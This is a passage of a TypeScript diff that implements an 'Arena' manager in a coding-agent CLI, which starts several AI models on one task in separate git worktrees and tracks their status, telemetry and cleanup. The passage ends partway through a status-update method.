+  /**
+   * Get the current session status.
+   */
+  getSessionStatus(): ArenaSessionStatus {
+    return this.sessionStatus;
+  }
+
+  /**
+   * Get the current task description (available while session is active).
+   */
+  getTask(): string | undefined {
+    return this.arenaConfig?.task;
+  }
+
+  /**
+   * Get all agent states.
+   */
+  getAgentStates(): ArenaAgentState[] {
+    return Array.from(this.agents.values());
+  }
+
+  /**
+   * Get a specific agent state.
+   */
+  getAgentState(agentId: string): ArenaAgentState | undefined {
+    return this.agents.get(agentId);
+  }
+
+  /**
+   * Get the cached session result (available after session completes).
+   */
+  getResult(): ArenaSessionResult | null {
+    return this.cachedResult;
+  }
+
+  /**
+   * Get the underlying backend for direct access.
+   * Returns null before the session initializes a backend.
+   */
+  getBackend(): Backend | null {
+    return this.backend;
+  }
+
+  /**
+   * Store the outer lifecycle promise so cancel/stop can wait for start()
+   * to fully unwind before proceeding with cleanup.
+   *
+   * The promise is only awaited, never read, so any resolved type is accepted.
+   */
+  setLifecyclePromise(p: Promise<unknown>): void {
+    this.lifecyclePromise = p;
+  }
+
+  /**
+   * Wait for the start lifecycle to fully settle (including error handling
+   * and listener teardown). Resolves immediately if no lifecycle is active.
+   */
+  async waitForSettled(): Promise<void> {
+    if (this.lifecyclePromise) {
+      await this.lifecyclePromise;
+    }
+  }
+
+  // ─── PTY Interaction ───────────────────────────────────────────
+
+  /**
+   * Switch the active agent for screen display and input routing.
+   */
+  switchToAgent(agentId: string): void {
+    this.backend?.switchTo(agentId);
+  }
+
+  /**
+   * Switch to the next agent in order.
+   */
+  switchToNextAgent(): void {
+    this.backend?.switchToNext();
+  }
+
+  /**
+   * Switch to the previous agent in order.
+   */
+  switchToPreviousAgent(): void {
+    this.backend?.switchToPrevious();
+  }
+
+  /**
+   * Get the ID of the currently active agent.
+   */
+  getActiveAgentId(): string | null {
+    return this.backend?.getActiveAgentId() ?? null;
+  }
+
+  /**
+   * Get the screen snapshot for the currently active agent.
+   */
+  getActiveSnapshot(): AnsiOutput | null {
+    return this.backend?.getActiveSnapshot() ?? null;
+  }
+
+  /**
+   * Get the screen snapshot for a specific agent.
+   */
+  getAgentSnapshot(
+    agentId: string,
+    scrollOffset: number = 0,
+  ): AnsiOutput | null {
+    return this.backend?.getAgentSnapshot(agentId, scrollOffset) ?? null;
+  }
+
+  /**
+   * Get the maximum scrollback length for an agent's terminal buffer.
+   */
+  getAgentScrollbackLength(agentId: string): number {
+    return this.backend?.getAgentScrollbackLength(agentId) ?? 0;
+  }
+
+  /**
+   * Forward keyboard input to the currently active agent.
+   */
+  forwardInput(data: string): boolean {
+    return this.backend?.forwardInput(data) ?? false;
+  }
+
+  /**
+   * Resize all agent terminals.
+   */
+  resizeAgents(cols: number, rows: number): void {
+    this.terminalCols = cols;
+    this.terminalRows = rows;
+    this.backend?.resizeAll(cols, rows);
+  }
+
+  // ─── Session Lifecycle ─────────────────────────────────────────
+
+  /**
+   * Start an Arena session.
+   *
+   * @param options - Arena start options
+   * @returns Promise resolving to the session result
+   * @throws Error when the options are invalid, git is unavailable, or the
+   *   working directory is not a git repository (all before any event is
+   *   emitted); errors raised after SESSION_START are re-thrown once
+   *   SESSION_ERROR has been emitted and the session is marked FAILED.
+   */
+  async start(options: ArenaStartOptions): Promise<ArenaSessionResult> {
+    // Validate options
+    this.validateStartOptions(options);
+
+    // Use caller-provided terminal size if available
+    if (options.cols && options.cols > 0) {
+      this.terminalCols = options.cols;
+    }
+    if (options.rows && options.rows > 0) {
+      this.terminalRows = options.rows;
+    }
+
+    this.sessionId = this.config.getSessionId();
+    this.worktreeDirName = await this.deriveWorktreeDirName(this.sessionId);
+    this.startedAt = Date.now();
+    this.sessionStatus = ArenaSessionStatus.INITIALIZING;
+    this.masterAbortController = new AbortController();
+
+    const sourceRepoPath = this.config.getWorkingDir();
+    const arenaSettings = this.config.getAgentsSettings().arena;
+
+    this.arenaConfig = {
+      sessionId: this.sessionId,
+      task: options.task,
+      models: options.models,
+      maxRoundsPerAgent:
+        options.maxRoundsPerAgent ?? arenaSettings?.maxRoundsPerAgent,
+      timeoutSeconds: options.timeoutSeconds ?? arenaSettings?.timeoutSeconds,
+      approvalMode: options.approvalMode,
+      sourceRepoPath,
+      chatHistory: options.chatHistory,
+    };
+
+    debugLogger.info(`Starting Arena session: ${this.sessionId}`);
+    debugLogger.info(`Task: ${options.task}`);
+    debugLogger.info(
+      `Models: ${options.models.map((m) => m.modelId).join(', ')}`,
+    );
+
+    // Fail fast on missing git or non-repo directory before any UI output
+    // so the user gets a clean, single error message without the
+    // "Arena started…" banner.
+    const gitCheck = await this.worktreeService.checkGitAvailable();
+    if (!gitCheck.available) {
+      throw new Error(gitCheck.error!);
+    }
+    const isRepo = await this.worktreeService.isGitRepository();
+    if (!isRepo) {
+      throw new Error(
+        'Failed to start arena: current directory is not a git repository.',
+      );
+    }
+
+    // Emit session start event
+    this.eventEmitter.emit(ArenaEventType.SESSION_START, {
+      sessionId: this.sessionId,
+      task: options.task,
+      models: options.models,
+      timestamp: Date.now(),
+    });
+
+    // Log arena session start telemetry
+    logArenaSessionStarted(
+      this.config,
+      makeArenaSessionStartedEvent({
+        arena_session_id: this.sessionId,
+        model_ids: options.models.map((m) => m.modelId),
+        task_length: options.task.length,
+      }),
+    );
+
+    try {
+      // Detect and initialize the backend.
+      // Priority: explicit option > agents.displayMode setting > auto-detect
+      const displayMode =
+        options.displayMode ??
+        (this.config.getAgentsSettings().displayMode as
+          | DisplayMode
+          | undefined);
+      await this.initializeBackend(displayMode);
+
+      // If cancelled during backend init, bail out early
+      if (this.masterAbortController?.signal.aborted) {
+        this.sessionStatus = ArenaSessionStatus.CANCELLED;
+        const result = await this.collectResults();
+        this.emitSessionEnded('cancelled');
+        return result;
+      }
+
+      // Set up worktrees for all agents
+      this.emitProgress(`Setting up environment for agents…`);
+      await this.setupWorktrees();
+
+      // If cancelled during worktree setup, bail out early
+      if (this.masterAbortController?.signal.aborted) {
+        this.sessionStatus = ArenaSessionStatus.CANCELLED;
+        const result = await this.collectResults();
+        this.emitSessionEnded('cancelled');
+        return result;
+      }
+
+      // Emit worktree info for each agent
+      const worktreeInfo = Array.from(this.agents.values())
+        .map(
+          (agent, i) =>
+            ` ${i + 1}. ${agent.model.modelId} → ${agent.worktree.path}`,
+        )
+        .join('\n');
+      this.emitProgress(`Environment ready. Agent worktrees:\n${worktreeInfo}`);
+
+      // Launch all agents through the backend (runAgents spawns them one by one)
+      this.emitProgress('Launching agents…');
+      this.sessionStatus = ArenaSessionStatus.RUNNING;
+      await this.runAgents();
+
+      // Mark session as idle (agents finished but still alive) unless
+      // already cancelled/timed out.
+      if (this.sessionStatus === ArenaSessionStatus.RUNNING) {
+        this.sessionStatus = ArenaSessionStatus.IDLE;
+      }
+
+      // Collect results (uses this.sessionStatus for result status)
+      const result = await this.collectResults();
+      this.cachedResult = result;
+
+      // Emit session complete event
+      this.eventEmitter.emit(ArenaEventType.SESSION_COMPLETE, {
+        sessionId: this.sessionId,
+        result,
+        timestamp: Date.now(),
+      });
+
+      this.callbacks.onArenaComplete?.(result);
+
+      // NOTE: session-ended telemetry is NOT emitted here.
+      // The session is "done running" but the user hasn't picked a winner
+      // or discarded yet. The ended event fires from applyAgentResult()
+      // (status: 'selected') or cleanup/cleanupRuntime (status: 'discarded').
+
+      return result;
+    } catch (error) {
+      this.sessionStatus = ArenaSessionStatus.FAILED;
+
+      const errorMessage =
+        error instanceof Error ? error.message : String(error);
+
+      // Emit session error event
+      this.eventEmitter.emit(ArenaEventType.SESSION_ERROR, {
+        sessionId: this.sessionId,
+        error: errorMessage,
+        timestamp: Date.now(),
+      });
+
+      // Log arena session failed telemetry
+      this.emitSessionEnded('failed');
+
+      this.callbacks.onArenaError?.(
+        error instanceof Error ? error : new Error(errorMessage),
+      );
+
+      throw error;
+    }
+  }
+
+  /**
+   * Cancel the current Arena session.
+   */
+  async cancel(): Promise<void> {
+    if (!this.sessionId) {
+      return;
+    }
+
+    debugLogger.info(`Cancelling Arena session: ${this.sessionId}`);
+
+    // Stop polling
+    this.stopPolling();
+
+    // Abort the master controller
+    this.masterAbortController?.abort();
+
+    // Force stop all PTY processes (sends Ctrl-C)
+    this.backend?.stopAll();
+
+    // Final stats sync so telemetry reflects the latest counters.
+    // For PTY agents: read each agent's status file one last time.
+    // For in-process agents: pull counters from the interactive object.
+    await this.pollAgentStatuses().catch(() => {});
+    for (const agent of this.agents.values()) {
+      if (!isTerminalStatus(agent.status)) {
+        agent.syncStats?.();
+      }
+    }
+
+    // Update agent statuses — skip agents already in a terminal state
+    // (COMPLETED, FAILED, CANCELLED) so we don't overwrite a successful result.
+    for (const agent of this.agents.values()) {
+      if (!isTerminalStatus(agent.status)) {
+        agent.abortController.abort();
+        agent.stats.durationMs = Date.now() - agent.startedAt;
+        this.updateAgentStatus(agent.agentId, AgentStatus.CANCELLED);
+      }
+    }
+
+    this.sessionStatus = ArenaSessionStatus.CANCELLED;
+
+    // NOTE: session-ended telemetry is NOT emitted here.
+    // start() emits 'cancelled' when it unwinds through its early-cancel
+    // paths. If cancel() is called after start() has already returned
+    // (all agents done, user viewing results), the ended event fires
+    // from cleanup() / cleanupRuntime() instead.
+  }
+
+  /**
+   * Clean up the Arena session (remove worktrees, kill processes, etc.).
+   */
+  async cleanup(): Promise<void> {
+    if (!this.sessionId) {
+      return;
+    }
+
+    debugLogger.info(`Cleaning up Arena session: ${this.sessionId}`);
+
+    // If no session-ended event was emitted yet, emit before tearing down.
+    // Use 'cancelled' if the session was explicitly stopped, 'discarded' if
+    // the user simply left without picking a winner.
+    this.emitSessionEnded(
+      this.sessionStatus === ArenaSessionStatus.CANCELLED
+        ? 'cancelled'
+        : 'discarded',
+    );
+
+    // Stop polling in case cleanup is called without cancel
+    this.stopPolling();
+
+    // Remove in-process event bridge listeners
+    this.teardownEventBridge();
+
+    // Clean up backend resources
+    if (this.backend) {
+      await this.backend.cleanup();
+    }
+
+    // Clean up worktrees. start() assigns worktreeDirName only after an
+    // await that follows setting sessionId, so a cleanup() racing session
+    // startup can still see it unset; there is nothing to remove in that case.
+    if (this.worktreeDirName) {
+      await this.worktreeService.cleanupSession(this.worktreeDirName);
+    }
+
+    this.agents.clear();
+    this.cachedResult = null;
+    this.sessionId = undefined;
+    this.worktreeDirName = undefined;
+    this.arenaConfig = undefined;
+    this.backend = null;
+    this.sessionEndedLogged = false;
+  }
+
+  /**
+   * Clean up runtime resources (processes, backend, memory) without removing
+   * worktrees or session files on disk. Used when preserveArtifacts is enabled.
+   */
+  async cleanupRuntime(): Promise<void> {
+    if (!this.sessionId) {
+      return;
+    }
+
+    debugLogger.info(
+      `Cleaning up Arena runtime (preserving artifacts): ${this.sessionId}`,
+    );
+
+    // If no session-ended event was emitted yet, emit before tearing down.
+    this.emitSessionEnded(
+      this.sessionStatus === ArenaSessionStatus.CANCELLED
+        ? 'cancelled'
+        : 'discarded',
+    );
+
+    this.stopPolling();
+
+    // Remove in-process event bridge listeners
+    this.teardownEventBridge();
+
+    if (this.backend) {
+      await this.backend.cleanup();
+    }
+
+    this.agents.clear();
+    this.cachedResult = null;
+    this.sessionId = undefined;
+    this.worktreeDirName = undefined;
+    this.arenaConfig = undefined;
+    this.backend = null;
+    this.sessionEndedLogged = false;
+  }
+
+  /**
+   * Apply the result from a specific agent to the main working directory.
+   *
+   * @returns `{ success: false, error }` when the agent is unknown or has not
+   *   reached a success status; otherwise the worktree service's apply result.
+   */
+  async applyAgentResult(
+    agentId: string,
+  ): Promise<{ success: boolean; error?: string }> {
+    const agent = this.agents.get(agentId);
+    if (!agent) {
+      return { success: false, error: `Agent ${agentId} not found` };
+    }
+
+    if (!isSuccessStatus(agent.status)) {
+      return {
+        success: false,
+        error: `Agent ${agentId} has not completed (current status: ${agent.status})`,
+      };
+    }
+
+    const applyResult = await this.worktreeService.applyWorktreeChanges(
+      agent.worktree.path,
+    );
+
+    if (applyResult.success) {
+      this.emitSessionEnded('selected', agent.model.modelId);
+    }
+
+    return applyResult;
+  }
+
+  /**
+   * Get the diff for a specific agent's changes.
+   *
+   * @returns The worktree diff, or an `Agent … not found` message when the
+   *   agent ID is unknown.
+   */
+  async getAgentDiff(agentId: string): Promise<string> {
+    const agent = this.agents.get(agentId);
+    if (!agent) {
+      return `Agent ${agentId} not found`;
+    }
+
+    return this.worktreeService.getWorktreeDiff(agent.worktree.path);
+  }
+
+  // ─── Private: Telemetry ───────────────────────────────────────
+
+  /**
+   * Emit the `arena_session_ended` telemetry event exactly once.
+   *
+   * Called from:
+   * - start() early-cancel paths → 'cancelled'
+   * - start() catch block → 'failed'
+   * - applyAgentResult() on success → 'selected' (with winner)
+   * - cleanup() / cleanupRuntime() → 'cancelled' if the session was
+   *   cancelled, otherwise 'discarded' (user left without picking)
+   *
+   * Later calls are ignored until cleanup resets the guard flag.
+   */
+  private emitSessionEnded(
+    status: ArenaSessionEndedStatus,
+    winnerModelId?: string,
+  ): void {
+    if (this.sessionEndedLogged) return;
+    this.sessionEndedLogged = true;
+
+    const agents = Array.from(this.agents.values());
+    logArenaSessionEnded(
+      this.config,
+      makeArenaSessionEndedEvent({
+        arena_session_id: this.sessionId ?? '',
+        status,
+        duration_ms: this.startedAt ? Date.now() - this.startedAt : 0,
+        display_backend: this.backend?.type,
+        agent_count: agents.length,
+        completed_agents: agents.filter(
+          (a) => a.status === AgentStatus.COMPLETED,
+        ).length,
+        failed_agents: agents.filter((a) => a.status === AgentStatus.FAILED)
+          .length,
+        cancelled_agents: agents.filter(
+          (a) => a.status === AgentStatus.CANCELLED,
+        ).length,
+        winner_model_id: winnerModelId,
+      }),
+    );
+  }
+
+  // ─── Private: Progress ─────────────────────────────────────────
+
+  /**
+   * Emit a progress message via SESSION_UPDATE so the UI can display
+   * setup status.
+   */
+  private emitProgress(
+    message: string,
+    type: 'info' | 'warning' | 'success' = 'info',
+  ): void {
+    if (!this.sessionId) return;
+    this.eventEmitter.emit(ArenaEventType.SESSION_UPDATE, {
+      sessionId: this.sessionId,
+      type,
+      message,
+      timestamp: Date.now(),
+    });
+  }
+
+  // ─── Private: Validation ───────────────────────────────────────
+
+  /**
+   * Validate start options before any session state is touched.
+   *
+   * @throws Error when fewer than 2 or more than ARENA_MAX_AGENTS models are
+   *   given, the task is blank, model IDs repeat, or distinct model IDs
+   *   collapse to the same filesystem-safe ID.
+   */
+  private validateStartOptions(options: ArenaStartOptions): void {
+    if (!options.models || options.models.length < 2) {
+      throw new Error('Arena requires at least 2 models to compare');
+    }
+
+    if (options.models.length > ARENA_MAX_AGENTS) {
+      throw new Error(`Arena supports a maximum of ${ARENA_MAX_AGENTS} models`);
+    }
+
+    if (!options.task || options.task.trim().length === 0) {
+      throw new Error('Arena requires a task/prompt');
+    }
+
+    // Check for duplicate model IDs
+    const modelIds = options.models.map((m) => m.modelId);
+    const uniqueIds = new Set(modelIds);
+    if (uniqueIds.size !== modelIds.length) {
+      throw new Error('Arena models must have unique identifiers');
+    }
+
+    // Check for collisions after filesystem-safe normalization.
+    // safeAgentId replaces characters like / \ : to '--', so distinct
+    // model IDs (e.g. "org/model" and "org--model") can map to the same
+    // status/control file path and corrupt each other's state.
+    const safeIds = modelIds.map((id) => safeAgentId(id));
+    const uniqueSafeIds = new Set(safeIds);
+    if (uniqueSafeIds.size !== safeIds.length) {
+      // Report every member of a colliding group (not only the later ones)
+      // so the message shows which IDs clash with each other.
+      const collisions = modelIds.filter((_, i) => {
+        const safeId = safeIds[i]!;
+        return safeIds.indexOf(safeId) !== safeIds.lastIndexOf(safeId);
+      });
+      throw new Error(
+        `Arena model IDs collide after path normalization: ${collisions.join(', ')}. ` +
+          'Choose model IDs that remain unique when special characters (/ \\ : etc.) are replaced.',
+      );
+    }
+  }
+
+  // ─── Private: Backend Initialization ───────────────────────────
+
+  /**
+   * Initialize the backend.
+   *
+   * Detects the backend for the requested display mode, initializes it and
+   * only then stores it on the manager, so a failed init() leaves
+   * `this.backend` unset. Any detection warning and attach hint are surfaced
+   * as SESSION_UPDATE events.
+   */
+  private async initializeBackend(displayMode?: DisplayMode): Promise<void> {
+    const { backend, warning } = await detectBackend(displayMode, this.config);
+    await backend.init();
+    this.backend = backend;
+
+    if (warning && this.sessionId) {
+      this.eventEmitter.emit(ArenaEventType.SESSION_UPDATE, {
+        sessionId: this.sessionId,
+        type: 'warning',
+        message: warning,
+        timestamp: Date.now(),
+      });
+    }
+
+    // Surface attach hint for external tmux sessions
+    const attachHint = backend.getAttachHint();
+    if (attachHint && this.sessionId) {
+      this.eventEmitter.emit(ArenaEventType.SESSION_UPDATE, {
+        sessionId: this.sessionId,
+        type: 'info',
+        message: `To view agent panes, run: ${attachHint}`,
+        timestamp: Date.now(),
+      });
+    }
+  }
+
+  // ─── Private: Worktree Setup ───────────────────────────────────
+
+  /**
+   * Derive a short, filesystem-friendly directory name from the full session ID.
+   * Uses the first 8 hex characters of the UUID. If that path already exists,
+   * appends a numeric suffix (-2, -3, …) until an unused name is found.
+   */
+  private async deriveWorktreeDirName(sessionId: string): Promise<string> {
+    const shortId = sessionId.replaceAll('-', '').slice(0, 8);
+    let candidate = shortId;
+    let suffix = 2;
+
+    while (true) {
+      const candidatePath = path.join(this.arenaBaseDir, candidate);
+      try {
+        await fs.access(candidatePath);
+        candidate = `${shortId}-${suffix}`;
+        suffix++;
+      } catch {
+        // Any access() failure is treated as "name is free".
+        return candidate;
+      }
+    }
+  }
+
+  /**
+   * Create one git worktree per configured model and register an
+   * INITIALIZING agent state for each, keyed by model ID.
+   *
+   * @throws Error when the arena config is missing, the worktree service
+   *   reports failure, or no worktree is returned for a model.
+   */
+  private async setupWorktrees(): Promise<void> {
+    if (!this.arenaConfig) {
+      throw new Error('Arena config not initialized');
+    }
+
+    debugLogger.info('Setting up worktrees for Arena agents');
+
+    const worktreeNames = this.arenaConfig.models.map((m) => m.modelId);
+
+    const result = await this.worktreeService.setupWorktrees({
+      sessionId: this.worktreeDirName!,
+      sourceRepoPath: this.arenaConfig.sourceRepoPath,
+      worktreeNames,
+      metadata: { arenaSessionId: this.arenaConfig.sessionId },
+    });
+
+    if (!result.success) {
+      const errorMessages = result.errors
+        .map((e) => `${e.name}: ${e.error}`)
+        .join('; ');
+      throw new Error(`Failed to set up worktrees: ${errorMessages}`);
+    }
+
+    // Create agent states
+    for (let i = 0; i < this.arenaConfig.models.length; i++) {
+      const model = this.arenaConfig.models[i]!;
+      const worktreeName = worktreeNames[i]!;
+      const worktree = result.worktreesByName[worktreeName];
+
+      if (!worktree) {
+        throw new Error(
+          `No worktree created for model ${model.modelId} (name: ${worktreeName})`,
+        );
+      }
+
+      const agentId = model.modelId;
+
+      const agentState: ArenaAgentState = {
+        agentId,
+        model,
+        status: AgentStatus.INITIALIZING,
+        worktree,
+        abortController: new AbortController(),
+        agentSessionId: `${this.sessionId}#${agentId}`,
+        stats: {
+          rounds: 0,
+          totalTokens: 0,
+          inputTokens: 0,
+          outputTokens: 0,
+          durationMs: 0,
+          toolCalls: 0,
+          successfulToolCalls: 0,
+          failedToolCalls: 0,
+        },
+        startedAt: 0,
+        accumulatedText: '',
+      };
+
+      this.agents.set(agentId, agentState);
+    }
+
+    debugLogger.info(`Created ${this.agents.size} agent
worktrees`);
+  }
+
+  // ─── Private: Agent Execution ──────────────────────────────────
+
+  /**
+   * Spawn every agent through the backend (one at a time), then wait until
+   * all agents have settled or the configured timeout elapses. On timeout
+   * the remaining agents are stopped and marked CANCELLED.
+   */
+  private async runAgents(): Promise<void> {
+    if (!this.arenaConfig) {
+      throw new Error('Arena config not initialized');
+    }
+
+    debugLogger.info('Starting Arena agents sequentially via backend');
+
+    const backend = this.requireBackend();
+
+    // Wire up exit handler on the backend
+    backend.setOnAgentExit((agentId, exitCode, signal) => {
+      this.handleAgentExit(agentId, exitCode, signal);
+    });
+
+    const isInProcess = backend.type === DISPLAY_MODE.IN_PROCESS;
+
+    // Spawn agents sequentially — each spawn completes before starting the next.
+    // This creates a visual effect where panes appear one by one.
+    for (const agent of this.agents.values()) {
+      await this.spawnAgentPty(agent);
+    }
+
+    this.emitProgress('All agents are now live and working on the task.');
+
+    // For in-process mode, set up event bridges instead of file-based polling.
+    // For PTY mode, start polling agent status files.
+    if (isInProcess) {
+      this.setupInProcessEventBridge(backend as InProcessBackend);
+    } else {
+      this.startPolling();
+    }
+
+    // Set up timeout
+    const timeoutSeconds = this.arenaConfig.timeoutSeconds;
+
+    // Wait for all agents to reach IDLE or TERMINATED, or timeout.
+    // Unlike waitForAll (which waits for PTY exit), this resolves as soon
+    // as every agent has finished its first task in interactive mode.
+    const allSettled = await this.waitForAllAgentsSettled(
+      timeoutSeconds ?
timeoutSeconds * 1000 : undefined,
+    );
+
+    // Stop polling when all agents are done (no-op for in-process mode)
+    if (!isInProcess) {
+      this.stopPolling();
+    }
+
+    if (!allSettled) {
+      debugLogger.info('Arena session timed out, stopping remaining agents');
+      this.sessionStatus = ArenaSessionStatus.CANCELLED;
+
+      // Terminate remaining active agents
+      for (const agent of this.agents.values()) {
+        if (!isTerminalStatus(agent.status)) {
+          backend.stopAgent(agent.agentId);
+          agent.abortController.abort();
+          agent.stats.durationMs = Date.now() - agent.startedAt;
+          this.updateAgentStatus(agent.agentId, AgentStatus.CANCELLED);
+        }
+      }
+    }
+
+    debugLogger.info('All Arena agents settled or timed out');
+  }
+
+  /**
+   * Mark an agent RUNNING, announce it, and spawn it through the backend.
+   *
+   * A spawn failure is recorded on the agent (status FAILED plus an
+   * AGENT_ERROR event) and is not re-thrown, so the other agents still start.
+   */
+  private async spawnAgentPty(agent: ArenaAgentState): Promise<void> {
+    if (!this.arenaConfig) {
+      return;
+    }
+
+    // Agents are spawned one at a time, so cancel() can land between two
+    // spawns. It has then already aborted this agent and marked it CANCELLED;
+    // continuing would flip the status back to RUNNING and launch a process
+    // for a cancelled session.
+    if (
+      agent.abortController.signal.aborted ||
+      this.masterAbortController?.signal.aborted
+    ) {
+      return;
+    }
+
+    const backend = this.requireBackend();
+
+    const { agentId, model, worktree } = agent;
+
+    debugLogger.info(`Spawning agent PTY: ${agentId}`);
+
+    agent.startedAt = Date.now();
+    this.updateAgentStatus(agentId, AgentStatus.RUNNING);
+
+    // Emit agent start event
+    this.eventEmitter.emit(ArenaEventType.AGENT_START, {
+      sessionId: this.arenaConfig.sessionId,
+      agentId,
+      model,
+      worktreePath: worktree.path,
+      timestamp: Date.now(),
+    });
+
+    this.callbacks.onAgentStart?.(agentId, model);
+
+    // Build the CLI command to spawn the agent as a full interactive instance
+    const spawnConfig = this.buildAgentSpawnConfig(agent);
+
+    try {
+      await backend.spawnAgent(spawnConfig);
+    } catch (error) {
+      const errorMessage =
+        error instanceof Error ? error.message : String(error);
+      agent.error = errorMessage;
+      this.updateAgentStatus(agentId, AgentStatus.FAILED);
+
+      this.eventEmitter.emit(ArenaEventType.AGENT_ERROR, {
+        sessionId: this.requireConfig().sessionId,
+        agentId,
+        error: errorMessage,
+        timestamp: Date.now(),
+      });
+
+      debugLogger.error(`Failed to spawn agent: ${agentId}`, error);
+    }
+  }
+
+  /** Return the initialized backend, or throw if none has been set yet. */
+  private requireBackend(): Backend {
+    if (!this.backend) {
+      throw new Error('Arena backend not initialized.');
+    }
+    return this.backend;
+  }
+
+  /** Return the active arena config, or throw if no session is configured. */
+  private requireConfig(): ArenaConfig {
+    if (!this.arenaConfig) {
+      throw new Error('Arena config not initialized');
+    }
+    return this.arenaConfig;
+  }
+
+  /**
+   * Backend exit callback: record the agent's duration and final status.
+   *
+   * Agents already in a terminal status are left untouched. Otherwise the
+   * agent becomes CANCELLED if its abort signal fired, else FAILED; an
+   * AGENT_ERROR event is emitted only for a non-zero, non-null exit code on
+   * a non-aborted agent.
+   */
+  private handleAgentExit(
+    agentId: string,
+    exitCode: number | null,
+    _signal: number | null,
+  ): void {
+    const agent = this.agents.get(agentId);
+    if (!agent) {
+      return;
+    }
+
+    // Already failed/cancelled (e.g. via cancel)
+    if (isTerminalStatus(agent.status)) {
+      return;
+    }
+
+    agent.stats.durationMs = Date.now() - agent.startedAt;
+
+    if (
+      exitCode !== 0 &&
+      exitCode !== null &&
+      !agent.abortController.signal.aborted
+    ) {
+      agent.error = `Process exited with code ${exitCode}`;
+      this.eventEmitter.emit(ArenaEventType.AGENT_ERROR, {
+        sessionId: this.requireConfig().sessionId,
+        agentId,
+        error: agent.error,
+        timestamp: Date.now(),
+      });
+    }
+
+    this.updateAgentStatus(
+      agentId,
+      agent.abortController.signal.aborted
+        ? AgentStatus.CANCELLED
+        : AgentStatus.FAILED,
+    );
+    debugLogger.info(`Agent exited: ${agentId} (exit code: ${exitCode})`);
+  }
+
+  /**
+   * Build the spawn configuration for an agent subprocess.
+   *
+   * The agent is launched as a full interactive CLI instance, running in
+   * its own worktree with the specified model. The task is passed via
+   * the --prompt argument so the CLI enters interactive mode and
+   * immediately starts working on the task.
+ */ + private buildAgentSpawnConfig(agent: ArenaAgentState): AgentSpawnConfig { + const { agentId, model, worktree } = agent; + + // Build CLI args for spawning an interactive agent. + // Note: --cwd is NOT a valid CLI flag; the working directory is set + // via AgentSpawnConfig.cwd which becomes the PTY's cwd. + const args: string[] = []; + + // Set the model and auth type + args.push('--model', model.modelId); + args.push('--auth-type', model.authType); + + // Pass the task via --prompt-interactive (-i) so the CLI enters + // interactive mode AND immediately starts working on the task. + // (--prompt runs non-interactively and would exit after completion.) + if (this.arenaConfig?.task) { + args.push('--prompt-interactive', this.arenaConfig.task); + } + + // Set approval mode if specified + if (this.arenaConfig?.approvalMode) { + args.push('--approval-mode', this.arenaConfig.approvalMode); + } + + // Pass the agent's session ID so the child CLI uses it for telemetry + // correlation instead of generating a random UUID. + args.push('--session-id', agent.agentSessionId); + + // Construct env vars for the agent + const arenaSessionDir = this.getArenaSessionDir(); + const env: Record = { + QWEN_CODE: '1', + ARENA_AGENT_ID: agentId, + ARENA_SESSION_ID: this.arenaConfig?.sessionId ?? 
'', + ARENA_SESSION_DIR: arenaSessionDir, + }; + + // If the model has auth overrides, pass them via env + if (model.apiKey) { + env['QWEN_API_KEY'] = model.apiKey; + } + if (model.baseUrl) { + env['QWEN_BASE_URL'] = model.baseUrl; + } + + const spawnConfig: AgentSpawnConfig = { + agentId, + command: process.execPath, // Use the same Node.js binary + args: [path.resolve(process.argv[1]!), ...args], // Re-launch the CLI entry point (must be absolute path since cwd changes) + cwd: worktree.path, + env, + cols: this.terminalCols, + rows: this.terminalRows, + inProcess: { + agentName: model.modelId, + initialTask: this.arenaConfig?.task, + runtimeConfig: { + promptConfig: { + systemPrompt: getCoreSystemPrompt( + this.config.getUserMemory(), + model.modelId, + ), + }, + modelConfig: { model: model.modelId }, + runConfig: { + max_turns: this.arenaConfig?.maxRoundsPerAgent, + max_time_minutes: this.arenaConfig?.timeoutSeconds + ? Math.ceil(this.arenaConfig.timeoutSeconds / 60) + : undefined, + }, + }, + authOverrides: { + authType: model.authType, + apiKey: model.apiKey, + baseUrl: model.baseUrl, + }, + chatHistory: this.arenaConfig?.chatHistory, + }, + }; + + debugLogger.info( + `[buildAgentSpawnConfig] agentId=${agentId}, command=${spawnConfig.command}, cliEntry=${process.argv[1]}, resolvedEntry=${path.resolve(process.argv[1]!)}`, + ); + debugLogger.info( + `[buildAgentSpawnConfig] args=${JSON.stringify(spawnConfig.args)}`, + ); + debugLogger.info( + `[buildAgentSpawnConfig] cwd=${spawnConfig.cwd}, env keys=${Object.keys(env).join(',')}`, + ); + + return spawnConfig; + } + + // ─── Private: Status & Results ───────────────────────────────── + + /** Decide whether a status transition is valid. Returns the new status or null. 
*/ + private resolveTransition( + current: AgentStatus, + incoming: AgentStatus, + ): AgentStatus | null { + if (current === incoming) return null; + if (isTerminalStatus(current)) { + // Allow revival: COMPLETED → RUNNING (agent received new input) + if ( + current === AgentStatus.COMPLETED && + incoming === AgentStatus.RUNNING + ) { + return incoming; + } + return null; + } + return incoming; + } + + private updateAgentStatus( + agentId: string, + newStatus: AgentStatus, + options?: { roundCancelledByUser?: boolean }, + ): void { + const agent = this.agents.get(agentId); + if (!agent) { + return; + } + + const previousStatus = agent.status; + agent.status = newStatus; + + this.eventEmitter.emit(ArenaEventType.AGENT_STATUS_CHANGE, { + sessionId: this.requireConfig().sessionId, + agentId, + previousStatus, + newStatus, + timestamp: Date.now(), + }); + + const label = agent.model.modelId; + + // Emit a success message when an agent finishes its initial task. + if ( + this.sessionStatus === ArenaSessionStatus.RUNNING && + previousStatus === AgentStatus.RUNNING && + newStatus === AgentStatus.IDLE + ) { + if (options?.roundCancelledByUser) { + this.emitProgress(`Agent ${label} is cancelled by user.`, 'warning'); + } else { + this.emitProgress(`Agent ${label} finished initial task.`, 'success'); + } + } + + // Emit progress messages for follow-up transitions (only after + // the initial task — the session is IDLE once all agents first settle). 
